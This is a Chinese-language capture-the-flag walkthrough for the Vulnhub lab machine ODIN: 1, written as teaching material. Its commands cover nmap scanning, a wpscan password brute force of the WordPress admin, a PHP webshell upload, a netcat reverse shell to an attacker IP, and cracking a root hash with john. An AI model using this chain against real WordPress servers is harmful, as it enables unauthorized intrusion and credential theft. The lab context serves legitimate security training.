ODIN: 1靶机渗透
字数 887 2025-08-15 21:33:54

ODIN: 1靶机渗透教学文档

靶机基础信息

  • 难度等级:简单
  • 靶机链接:Vulnhub下载地址
  • 发布日期:2020年11月21日
  • 目标:获取root权限
  • 网络配置:建议使用Host-only模式

环境准备

  1. 将靶机IP添加到hosts文件:

    echo "192.168.56.106 odin" >> /etc/hosts
    
  2. 确认网络连通性:

    ping odin
    

信息收集阶段

1. 扫描网络发现靶机IP

使用nmap扫描本地网络:

nmap 192.168.56.0/24

发现靶机IP:192.168.56.106

2. 端口和服务扫描

详细扫描靶机开放端口和服务:

nmap -sV -p- -A -O 192.168.56.106

扫描结果:

  • 80/tcp:Apache httpd 2.4.41 (Ubuntu)

漏洞探测与利用

1. 目录扫描

使用dirb进行目录扫描:

dirb http://odin/

发现关键路径:

  • WordPress登录页面:/wp-login.php

2. WordPress爆破

使用wpscan进行密码爆破:

wpscan --url http://odin --usernames admin --passwords /usr/share/wordlists/rockyou.txt

获取凭证:

  • 用户名:admin
  • 密码:qwerty

3. 上传WebShell

  1. 登录WordPress后台
  2. 进入Plugins → Add New
  3. 上传精心构造的PHP WebShell(可使用哥斯拉生成)

4. 连接WebShell

  1. 找到上传的WebShell路径:
    http://odin/wp-content/uploads/[上传文件名]
    
  2. 使用哥斯拉连接WebShell

5. 反弹Shell

在WebShell中执行:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [攻击机IP] 1234 >/tmp/f

在攻击机监听:

nc -lvnp 1234

6. 建立交互式Shell

python3 -c "import pty;pty.spawn('/bin/bash')"

权限提升

1. 查找敏感文件

cd /var/www/html
cat wp-config.php

发现root用户加密密码:

$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01

2. 破解密码

  1. 将加密密码保存到passwd文件
  2. 使用john破解:
    john passwd
    

获取root密码:jasmine

3. 提权

su root

输入密码:jasmine

4. 获取flag

cd /root
cat flag.txt

总结

  1. 信息收集:nmap扫描发现服务,dirb发现WordPress
  2. 漏洞利用:爆破WordPress弱密码,上传WebShell
  3. 权限提升:通过配置文件泄露的加密密码,破解后直接提权

关键点备忘

  • WordPress默认登录路径:/wp-login.php
  • 上传WebShell的常见位置:/wp-content/uploads/
  • wp-config.php文件通常包含数据库凭证,有时也包含系统密码
  • Linux密码哈希格式:\(6\)表示SHA512加密
ODIN: 1靶机渗透教学文档 靶机基础信息 难度等级:简单 靶机链接: Vulnhub下载地址 发布日期:2020年11月21日 目标:获取root权限 网络配置:建议使用Host-only模式 环境准备 将靶机IP添加到hosts文件: 确认网络连通性: 信息收集阶段 1. 扫描网络发现靶机IP 使用nmap扫描本地网络: 发现靶机IP:192.168.56.106 2. 端口和服务扫描 详细扫描靶机开放端口和服务: 扫描结果: 80/tcp:Apache httpd 2.4.41 (Ubuntu) 漏洞探测与利用 1. 目录扫描 使用dirb进行目录扫描: 发现关键路径: WordPress登录页面:/wp-login.php 2. WordPress爆破 使用wpscan进行密码爆破: 获取凭证: 用户名:admin 密码:qwerty 3. 上传WebShell 登录WordPress后台 进入Plugins → Add New 上传精心构造的PHP WebShell(可使用哥斯拉生成) 4. 连接WebShell 找到上传的WebShell路径: 使用哥斯拉连接WebShell 5. 反弹Shell 在WebShell中执行: 在攻击机监听: 6. 建立交互式Shell 权限提升 1. 查找敏感文件 发现root用户加密密码: 2. 破解密码 将加密密码保存到passwd文件 使用john破解: 获取root密码:jasmine 3. 提权 输入密码:jasmine 4. 获取flag 总结 信息收集:nmap扫描发现服务,dirb发现WordPress 漏洞利用:爆破WordPress弱密码,上传WebShell 权限提升:通过配置文件泄露的加密密码,破解后直接提权 关键点备忘 WordPress默认登录路径:/wp-login.php 上传WebShell的常见位置:/wp-content/uploads/ wp-config.php文件通常包含数据库凭证,有时也包含系统密码 Linux密码哈希格式:$6$表示SHA512加密